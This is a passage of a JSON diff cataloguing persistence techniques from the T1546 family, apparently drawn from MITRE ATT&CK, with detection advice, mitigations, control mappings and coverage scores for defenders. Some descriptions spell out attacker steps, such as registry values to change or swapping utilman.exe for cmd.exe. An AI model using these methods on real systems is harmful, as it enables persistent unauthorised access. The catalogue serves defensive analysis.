+        "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension.(Citation: Wikipedia Screensaver) The Windows screensaver application scrnsave.scr is located in C:\\Windows\\System32\\, and C:\\Windows\\sysWOW64\\  on 64-bit Windows systems, along with screensavers included with base Windows installations.\n\nThe following screensaver settings are stored in the Registry (HKCU\\Control Panel\\Desktop\\) and could be manipulated to achieve persistence:\n\n* SCRNSAVE.exe - set to malicious PE path\n* ScreenSaveActive - set to '1' to enable the screensaver\n* ScreenSaverIsSecure - set to '0' to not require a password to unlock\n* ScreenSaveTimeout - sets user inactivity timeout before screensaver is executed\n\nAdversaries can use screensaver settings to maintain persistence by setting the screensaver to run malware after a certain timeframe of user inactivity. (Citation: ESET Gazer Aug 2017)",
+        "url": "https://attack.mitre.org/techniques/T1546/002",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor process execution and command-line parameters of .scr files. Monitor changes to screensaver configuration changes in the Registry that may not correlate with typical user behavior.\n\nTools such as Sysinternals Autoruns can be used to detect changes to the screensaver binary path in the Registry. Suspicious paths and PE files may indicate outliers among legitimate screensavers in a network and should be investigated.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.2761904761904762,
+        "adjusted_score": 0.2761904761904762,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "4.1",
+            "4.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SI-10",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.003",
+        "name": "Event Triggered Execution: Windows Management Instrumentation Event Subscription",
+        "description": "Adversaries may establish persistence and elevate privileges by executing malicious content triggered by a Windows Management Instrumentation (WMI) event subscription. WMI can be used to install event filters, providers, consumers, and bindings that execute code when a defined event occurs. Examples of events that may be subscribed to are the wall clock time, user loging, or the computer's uptime. (Citation: Mandiant M-Trends 2015)\n\nAdversaries may use the capabilities of WMI to subscribe to an event and execute arbitrary code when that event occurs, providing persistence on a system. (Citation: FireEye WMI SANS 2015) (Citation: FireEye WMI 2015) Adversaries may also compile WMI scripts into Windows Management Object (MOF) files (.mof extension) that can be used to create a malicious subscription. (Citation: Dell WMI Persistence) (Citation: Microsoft MOF May 2018)\n\nWMI subscription execution is proxied by the WMI Provider Host process (WmiPrvSe.exe) and thus may result in elevated SYSTEM privileges.",
+        "url": "https://attack.mitre.org/techniques/T1546/003",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor WMI event subscription entries, comparing current WMI event subscriptions to known good subscriptions for each host. Tools such as Sysinternals Autoruns may also be used to detect WMI changes that could be attempts at persistence. (Citation: TechNet Autoruns) (Citation: Medium Detecting WMI Persistence) Monitor for the creation of new WMI EventFilter, EventConsumer, and FilterToConsumerBinding events. Event ID 5861 is logged on Windows 10 systems when new EventFilterToConsumerBinding events are created.(Citation: Elastic - Hunting for Persistence Part 1)\n\nMonitor processes and command-line arguments that can be used to register WMI persistence, such as the  Register-WmiEvent [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet (Citation: Microsoft Register-WmiEvent), as well as those that result from the execution of subscriptions (i.e. spawning from the WmiPrvSe.exe WMI Provider Host process).",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "WMI: WMI Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1040",
+                "name": "Behavior Prevention on Endpoint",
+                "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.",
+                "url": "https://attack.mitre.org/mitigations/M1040"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.36190476190476195,
+        "adjusted_score": 0.36190476190476195,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.2",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "IA-2",
+            "SI-14",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.004",
+        "name": "Event Triggered Execution: Unix Shell Configuration Modification",
+        "description": "Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User [Unix Shell](https://attack.mitre.org/techniques/T1059/004)s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system (/etc) and the user’s home directory (~/) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately. \n\nAdversaries may attempt to establish persistence by inserting commands into scripts automatically executed by shells. Using bash as an example, the default shell for most GNU/Linux systems, adversaries may add commands that launch malicious binaries into the /etc/profile and /etc/profile.d files.(Citation: intezer-kaiji-malware)(Citation: bencane blog bashrc) These files typically require root permissions to modify and are executed each time any shell on a system launches. For user level permissions, adversaries can insert malicious commands into ~/.bash_profile, ~/.bash_login, or ~/.profile which are sourced when a user opens a command-line interface or connects remotely.(Citation: anomali-rocke-tactics)(Citation: Linux manual bash invocation) Since the system only executes the first existing file in the listed order, adversaries have used ~/.bash_profile to ensure execution. Adversaries have also leveraged the ~/.bashrc file which is additionally executed if the connection is established remotely or an additional interactive shell is opened, such as a new tab in the command-line interface.(Citation: Tsunami)(Citation: anomali-rocke-tactics)(Citation: anomali-linux-rabbit)(Citation: Magento) Some malware targets the termination of a program to trigger execution, adversaries can use the ~/.bash_logout file to execute malicious commands at the end of a session. \n\nFor macOS, the functionality of this technique is similar but may leverage zsh, the default shell for macOS 10.15+. When the Terminal.app is opened, the application launches a zsh login shell and a zsh interactive shell. The login shell configures the system environment using /etc/profile, /etc/zshenv, /etc/zprofile, and /etc/zlogin.(Citation: ScriptingOSX zsh)(Citation: PersistentJXA_leopitt)(Citation: code_persistence_zsh)(Citation: macOS MS office sandbox escape) The login shell then configures the user environment with ~/.zprofile and ~/.zlogin. The interactive shell uses the ~/.zshrc to configure the user environment. Upon exiting, /etc/zlogout and ~/.zlogout are executed. For legacy programs, macOS executes /etc/bashrc on startup.",
+        "url": "https://attack.mitre.org/techniques/T1546/004",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "While users may customize their shell profile files, there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\n\nMonitor for changes to /etc/profile and /etc/profile.d, these files should only be modified by system administrators. MacOS users can leverage Endpoint Security Framework file events monitoring these specific files.(Citation: ESF_filemonitor) \n\nFor most Linux and macOS systems, a list of file paths for valid shell options available on a system are located in the /etc/shells file.\n",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.26190476190476186,
+        "adjusted_score": 0.26190476190476186,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.7",
+            "3.3",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.005",
+        "name": "Event Triggered Execution: Trap",
+        "description": "Adversaries may establish persistence by executing malicious content triggered by an interrupt signal. The trap command allows programs and shells to specify commands that will be executed upon receiving interrupt signals. A common situation is a script allowing for graceful termination and handling of common keyboard interrupts like ctrl+c and ctrl+d.\n\nAdversaries can use this to register code to be executed when the shell encounters specific interrupts as a persistence mechanism. Trap commands are of the following format trap 'command list' signals where \"command list\" will be executed when \"signals\" are received.(Citation: Trap Manual)(Citation: Cyberciti Trap Statements)",
+        "url": "https://attack.mitre.org/techniques/T1546/005",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Trap commands must be registered for the shell or programs, so they appear in files. Monitoring files for suspicious or overly broad trap commands can narrow down suspicious behavior during an investigation. Monitor for suspicious processes executed through trap interrupts.",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.1,
+        "adjusted_score": 0.1,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.006",
+        "name": "Event Triggered Execution: LC_LOAD_DYLIB Addition",
+        "description": "Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies. (Citation: Writing Bad Malware for OSX) There are tools available to perform these changes.\n\nAdversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time. (Citation: Malware Persistence on OS X)",
+        "url": "https://attack.mitre.org/techniques/T1546/006",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor processes for those that may be used to modify binary headers. Monitor file systems for changes to application binaries and invalid checksums/signatures. Changes to binaries that do not line up with application updates or patches are also extremely suspicious.",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Metadata",
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1045",
+                "name": "Code Signing",
+                "description": "Enforce binary and application integrity with digital signature verification to prevent untrusted code from executing.",
+                "url": "https://attack.mitre.org/mitigations/M1045"
+            },
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.28095238095238095,
+        "adjusted_score": 0.28095238095238095,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.5",
+            "2.6",
+            "4.1",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-9",
+            "SI-10",
+            "SI-2",
+            "SI-3",
+            "SI-4",
+            "SI-7",
+            "SR-11",
+            "SR-4",
+            "SR-5",
+            "SR-6"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.007",
+        "name": "Event Triggered Execution: Netsh Helper DLL",
+        "description": "Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. (Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\\SOFTWARE\\Microsoft\\Netsh.\n\nAdversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality. (Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)",
+        "url": "https://attack.mitre.org/techniques/T1546/007",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "It is likely unusual for netsh.exe to have any child processes in most environments. Monitor process executions and investigate any child processes spawned by netsh.exe for malicious behavior. Monitor the HKLM\\SOFTWARE\\Microsoft\\Netsh registry key for any new or suspicious entries that do not correlate with known system files or benign software. (Citation: Demaske Netsh Persistence)",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.10952380952380952,
+        "adjusted_score": 0.10952380952380952,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.008",
+        "name": "Event Triggered Execution: Accessibility Features",
+        "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.\n\nTwo common accessibility programs are C:\\Windows\\System32\\sethc.exe, launched when the shift key is pressed five times and C:\\Windows\\System32\\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as \"sticky keys\", and has been used by adversaries for unauthenticated access through a remote desktop login screen. (Citation: FireEye Hikit Rootkit)\n\nDepending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\\, and it must be protected by Windows File or Resource Protection (WFP/WRP). (Citation: DEFCON2016 Sticky Keys) The [Image File Execution Options Injection](https://attack.mitre.org/techniques/T1546/012) debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.\n\nFor simple binary replacement on Windows XP and later as well as and Windows Server 2003/R2 and later, for example, the program (e.g., C:\\Windows\\System32\\utilman.exe) may be replaced with \"cmd.exe\" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) will cause the replaced file to be executed with SYSTEM privileges. (Citation: Tilbury 2014)\n\nOther accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)(Citation: Narrator Accessibility Abuse)\n\n* On-Screen Keyboard: C:\\Windows\\System32\\osk.exe\n* Magnifier: C:\\Windows\\System32\\Magnify.exe\n* Narrator: C:\\Windows\\System32\\Narrator.exe\n* Display Switcher: C:\\Windows\\System32\\DisplaySwitch.exe\n* App Switcher: C:\\Windows\\System32\\AtBroker.exe",
+        "url": "https://attack.mitre.org/techniques/T1546/008",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Changes to accessibility utility binaries or binary paths that do not correlate with known software, patch cycles, etc., are suspicious. Command line invocation of tools capable of modifying the Registry for associated keys are also suspicious. Utility arguments and the binaries themselves should be monitored for changes. Monitor Registry keys within HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1035",
+                "name": "Limit Access to Resource Over Network",
+                "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.",
+                "url": "https://attack.mitre.org/mitigations/M1035"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            }
+        ],
+        "cumulative_score": 0.3,
+        "adjusted_score": 0.3,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.5",
+            "4.1",
+            "4.2",
+            "12.2",
+            "12.7",
+            "13.5",
+            "18.3",
+            "18.5",
+            "13.10"
+        ],
+        "nist_controls": [
+            "CM-10",
+            "CM-6",
+            "CM-7",
+            "SI-10",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.009",
+        "name": "Event Triggered Execution: AppCert DLLs",
+        "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Session Manager\\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. (Citation: Elastic Process Injection July 2017)\n\nSimilar to [Process Injection](https://attack.mitre.org/techniques/T1055), this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity. ",
+        "url": "https://attack.mitre.org/techniques/T1546/009",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor DLL loads by processes, specifically looking for DLLs that are not recognized or not normally loaded into a process. Monitor the AppCertDLLs Registry value for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017) \n\nTools such as Sysinternals Autoruns may overlook AppCert DLLs as an auto-starting location. (Citation: TechNet Autoruns) (Citation: Sysinternals AppCertDlls Oct 2007)\n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            }
+        ],
+        "cumulative_score": 0.1523809523809524,
+        "adjusted_score": 0.1523809523809524,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.6"
+        ],
+        "nist_controls": [
+            "CM-7",
+            "SI-10",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.010",
+        "name": "Event Triggered Execution: AppInit DLLs",
+        "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)",
+        "url": "https://attack.mitre.org/techniques/T1546/010",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1038",
+                "name": "Execution Prevention",
+                "description": "Block execution of code on a system through application control, and/or script blocking.",
+                "url": "https://attack.mitre.org/mitigations/M1038"
+            },
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.6",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "CM-2",
+            "CM-7",
+            "SI-10",
+            "SI-2",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.011",
+        "name": "Event Triggered Execution: Application Shimming",
+        "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. (Citation: Elastic Process Injection July 2017)\n\nWithin the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS. \n\nA list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:\n\n* %WINDIR%\\AppPatch\\sysmain.sdb and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\installedsdb\n\nCustom databases are stored in:\n\n* %WINDIR%\\AppPatch\\custom & %WINDIR%\\AppPatch\\AppPatch64\\Custom and\n* hklm\\software\\microsoft\\windows nt\\currentversion\\appcompatflags\\custom\n\nTo keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel and you must have administrator privileges to install a shim. However, certain shims can be used to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structure Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).\n\nUtilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. (Citation: FireEye Application Shimming) Shims can also be abused to establish persistence by continuously being invoked by affected programs.",
+        "url": "https://attack.mitre.org/techniques/T1546/011",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "There are several public tools available that will detect shims that are currently available (Citation: Black Hat 2015 App Shim):\n\n* Shim-Process-Scanner - checks memory of every running process for any shim flags\n* Shim-Detector-Lite - detects installation of custom shim databases\n* Shim-Guard - monitors registry for any shim installations\n* ShimScanner - forensic tool to find active shims in memory\n* ShimCacheMem - Volatility plug-in that pulls shim cache from memory (note: shims are only cached after reboot)\n\nMonitor process execution for sdbinst.exe and command-line arguments for potential indications of application shim abuse.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Module: Module Load",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Modification"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1546",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1051",
+                "name": "Update Software",
+                "description": "Perform regular software updates to mitigate exploitation risk.",
+                "url": "https://attack.mitre.org/mitigations/M1051"
+            },
+            {
+                "mid": "M1052",
+                "name": "User Account Control",
+                "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.",
+                "url": "https://attack.mitre.org/mitigations/M1052"
+            }
+        ],
+        "cumulative_score": 0.21904761904761905,
+        "adjusted_score": 0.21904761904761905,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "7.1",
+            "7.2",
+            "7.3",
+            "7.5",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-6",
+            "SI-2"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1546.012",
+        "name": "Event Triggered Execution: Image File Execution Options Injection",
